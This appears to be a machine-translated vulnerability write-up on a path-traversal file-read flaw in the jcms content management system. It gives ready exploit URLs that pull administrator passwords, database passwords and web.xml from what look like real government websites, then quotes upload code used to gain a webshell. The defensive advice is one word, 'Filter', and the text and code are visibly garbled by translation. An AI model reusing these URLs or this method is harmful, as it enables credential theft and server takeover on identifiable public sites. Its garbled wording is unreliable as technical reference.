Reading getshell from arbitrary system files

Reading getshell from arbitrary system files

 

Attackers can read arbitrary files in the jcms system and directly obtain sensitive information such as administrator accounts, passwords, database passwords, and configurations, you can easily obtain webshell without any restrictions...

The vulnerability occurs in the following connections:

/Jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp

1) retrieve the administrator password in plaintext

Http://anxiang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp? Filename = ../WEB-INF/ini/merpserver. ini
 

2) retrieve the plaintext of the Database Password
 

3) obtain sensitive information about the configuration file

Http://www.wugang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp? Filename = ../WEB-INF/web. xml
 

After obtaining the administrator password, you can directly obtain the shell by truncation. The defect code is as follows:
 

If (request. getMethod (). toUpperCase (). equals ("POST") {Jcms_UpdaterecordBLF blf = new Jcms_UpdaterecordBLF ("1"); Jcms_Update_RecordEntity entity = new Jcms_Update_RecordEntity (); // extract path String strFilePath = strSysPath + "/update/"; // temporary directory for zip file upload String strTemp = strFilePath + "temp/"; Convert. createDirectory (strTemp); // create upload = new CommonUploadFile (strTemp, ""); try {// upload the zip package boolean bResult = uploa D. uploadFile (request); String [] strFileName = upload. getAllFileName (); strBakPath = upload. getFormValue ("vc_bakPath"); strBakPath = Convert. getValue (strBakPath); strBakPath = (strBakPath. trim (). length () = 0 )? StrFilePath: strBakPath; strBakPath = strBakPath. replaceAll ("\\\\", "/"); if (strBakPath. endsWith ("/") | strBakPath. endsWith ("\") strBakPath = strBakPath. substring (0, strBakPath. length ()-1); strBakPath = strBakPath + "/bak/"; // create the Backup Directory Convert. createDirectory (strBakPath); ZipFile zip = new ZipFile (); // decompress the zip package boolean bl = zip. unzip (true, strTemp + strFileName [0]. trim (), strFilePath); String strDate = DateFo Rmat. getStrCurrentDate (DateFormat. LONG_DATE_TIME); // zip package name String strZipName = strFileName [0]. substring (0, strFileName [0]. lastIndexOf (". zip "); if (bResult & bl) {entity. setVc_packagename (strZipName); entity. setVc_spath (strFilePath); entity. setVc_bpath (strBakPath); entity. setC_createtime (strDate); entity. setI_flag (1); entity. setVc_status ("not executed"); entity. setB_cancel (0); bl = blf. doInsert (entity);} if (! Bl) {LogWriter. error ("ERROR: mark record! ");} Else {// Delete the uploaded zip file jcms. util. fileUtil. deleteFolder (strTemp) ;}} catch (Exception e) {LogWriter. error ("ERROR:" + e. toString ();} out. println (Convert. getAlterScript ("alert ('upload successful! '); "); Out. println (Convert. getAlterScript (" top. location. reload (); "); return;} // End if %>

 

After obtaining the administrator password, get the shell as follows:
 

 

Solution:

Filter